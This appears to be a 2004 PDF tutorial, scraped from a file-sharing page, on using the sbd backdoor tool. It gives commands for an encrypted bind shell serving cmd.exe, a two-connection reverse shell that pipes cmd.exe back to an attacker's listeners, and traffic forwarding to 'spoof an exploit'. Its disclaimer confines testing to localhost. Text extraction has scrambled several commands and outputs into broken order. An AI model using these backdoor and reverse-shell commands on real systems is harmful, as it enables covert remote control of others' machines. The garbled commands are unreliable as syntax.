A small tutorial on sbd.pdf

(21 KB) Pobierz
A small tutorial on sbd, Shadowinteger's Backdoor.
Version 1.0 by xxradar
mailto:xxradar@radarhack.com
http://www.radarhack.com
1. Introduction.
An article on
http://www.secureit.co.il
discussed the
availability of sbd (Shadowinteger's Backdoor), available at
http://www.cycom.se/dl/sbd.
It is described as a ‘Netcat-
clone, designed to be portable and offer strong encryption’.
It supports aes-128 encryption and is available on most
platforms, including win32 and Linux.
Let’s check out some possibilities, using simple examples.
Please note that all testing is done in a private test
environment. The results are described in this paper using
127.0.0.1 addresses. This paper is solely for educational
use and the techniques are only to be reproduced in a test
environment. Do not use this information to cause harm to
other computers and/or people.
2. Connecting to a remote server
The simplest example explains on how to establish a TCP
connection to a remote server and issue some protocol
commands. Specifying the ‘-c off’ switch disables the
default built-in encryption of the sbd client.
D:\sbd-1.27\binaries>sbd -c off www.radarhack.com 80
GET / HTTP/1.1
Date: Thu, 17 Jun 2004 18:38:03 GMT
Server: Apache/1.3.27 (Unix) mod_jk/1.2.0 Chili!Soft-ASP/3.6.2 mod_perl/1.26 mod
_throttle/3.1.2 PHP/4.3.1 FrontPage/4.0.4.3 mod_ssl/2.8.11 OpenSSL/0.9.6h
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1
127
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
….
3. Chatting
The next example shows how to use sbd as a ‘chat client’
and ‘server’. All the communications are by default
encrypted by AES and preceded with a PREFIX (‘-P prefix’).
By specifying the ‘-l’ switch, sbd is put in listing mode
on TCP port 100 (‘-p 100’)
On the server side:
D:\sbd-1.27\binaries>sbd -P xxradar -l -p 100
demolisher: I the connector ....
I'm de receiver ....
On the client side:
D:\sbd-1.27\binaries>sbd -P demolisher 127.0.0.1 100
I the connector ....
xxradar: I'm de receiver ....
From the moment the client disconnects, the server side
will exit. In order to ‘respawn’ the server, specify the
‘-r seconds’ switch. The server will be listening again
after the specified amount of time. This might prevent the
backdoor from existing and prevent to reconnect. Specifying
a time of 0 seconds, will respawn the server immediately.
D:\sbd-1.27\binaries>sbd
demolisher: test1
demolisher: test2
-r 8 f -P server -l -p 100
D:\sbd-1.27\binaries>sbd -P demolisher 127.0.0.1 100
test1
^C
D:\sbd-1.27\binaries>sbd -P demolisher 127.0.0.1 100
connect(): WSAECONNREFUSED
D:\sbd-1.27\binaries>sbd -P demolisher 127.0.0.1 100
connect(): WSAECONNREFUSED
… after 8 seconds ….
D:\sbd-1.27\binaries>sbd -P demolisher 127.0.0.1 100
test2
^C
D:\sbd-1.27\binaries>
5. Getting a command shell
Let’s get into something more ‘interesting’. If you want
to setup an encrypted connection on neither what TCP port,
providing you with a command shell? Here it is!
On the server side:
D:\sbd-1.27\binaries>sbd
-r 0
-l -p 100 -e cmd.exe
On the server side:
D:\sbd-1.27\binaries>sbd 127.0.0.1 100
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
D:\sbd-1.27\binaries>date
date
The current date is: Thu 06/17/2004
Enter the new date: (mm-dd-yy)
Using the monitor switch ‘-m on’ on the server side, will
display on the server side an echo of the communication.
On the server side:
D:\sbd-1.27\binaries>sbd -m on -r 0 -l -p 100 -e cmd.exe
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
D:\date
date
The current date is: Thu 06/17/2004
Enter the new date: (mm-dd-yy)
On the client side:
D:\sbd-1.27\binaries>sbd 127.0.0.1 100
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
D:\date
date
The current date is: Thu 06/17/2004
Enter the new date: (mm-dd-yy)
6. Creating a reverse shell
The previous example is quite simple, but you need to be
able to connect to an open port on the server on which the
backdoor is running. This will be often impossible, due to
firewall configurations. Chances are much bigger, if we
could make the shell connect to the outside (assuming the
server can connect out for some services like SMTP, http,
dns, ….) where our sbd client is listening.
First of all, create two listening sockets on the attacking
client. The first one will allow to send commands to the
backdoor.
D:\sbd-1.27\binaries>sbd -l -p 2000
dir
A different cmd shell will function as output channel.
D:\sbd-1.27\binaries>sbd -l -p 3000
Volume in drive D is BACKUP
Volume Serial Number is 584C-2AAD
Directory of D:\
06/17/2004
06/17/2004
06/17/2004
08/23/2001
06/17/2004
06/17/2004
06/17/2004
D:\>
09:58
09:58
09:27
02:00
10:00
10:01
09:25
PM
PM
PM
PM
PM
PM
PM
<DIR>
<DIR>
15
114,688
20
0
15
.
..
backup.txt
calc.exe
command.txt
dump.txt
in.log
Then run the following command on the server
D:\sbd-1.27\binaries>sbd 127.0.0.1 2000 | cmd.exe | sbd 127.0.0.1 3000
This command actually connects to port 2000 and will
receive commands from the client, which are piped in the
cmd.exe. The output is send back across another connection
back to the attacker.
7. TCP connection forwarding
In the next example, a listening socket is setup that will
forward the in client’s input to a next server. This might
be a handy trick to forward and spoof an exploit☺. Note
that the return data is only displayed at the server side
of sbd. (You can create an additional pipe to return the
info to the client).
On the server side:
D:\sbd-1.27\binaries>sbd -vv -l -p 90 | sbd -c off www.radarhack.com 80
listening on port 90
connect to 127.0.0.1:90 from 127.0.0.1:1700 (localhost)
HTTP/1.1 302 Found
Date: Sun, 20 Jun 2004 14:07:42 GMT
Server: Apache/1.3.27 (Unix) mod_jk/1.2.0 Chili!Soft-ASP/3.6.2 mod_perl/1.26 mod
_throttle/3.1.2 PHP/4.3.1 FrontPage/4.0.4.3 mod_ssl/2.8.11 OpenSSL/0.9.6h
Location: http://www.radarhack.com/error_docs/not_found.html
Connection: close
Content-Type: text/html; charset=iso-8859-1
On the client side:
D:\sbd-1.27\binaries>sbd 127.0.0.1 90
HEAD / HTTP/1.0
8. Logging to a file or transferring files
Logging to a file is as simple as illustrated in the next
examples. (You must specify the < NUL >!)
On the server side:
D:\sbd-1.27\binaries>sbd
-l -p 100 < NUL > in.log
D:\sbd-1.27\binaries>type in.log
This is a test!
On the client side:
D:\sbd-1.27\binaries>sbd
this is a test
^C
D:\sbd-1.27\binaries>
127.0.0.1 100
Copying files is illustrated in the next example (works
also with executable files)
On the server side:
D:\sbd-1.27\binaries>sbd
-l -p 100 < NUL > backup.txt
D:\sbd-1.27\binaries>type backup.txt
this is a test
D:\sbd-1.27\binaries>
On the client side:
D:\sbd-1.27\binaries>sbd
127.0.0.1 100 < in.log

Plik z chomika:

Inne pliki z tego folderu:

Inne foldery tego chomika:

Zgłoś jeśli naruszono regulamin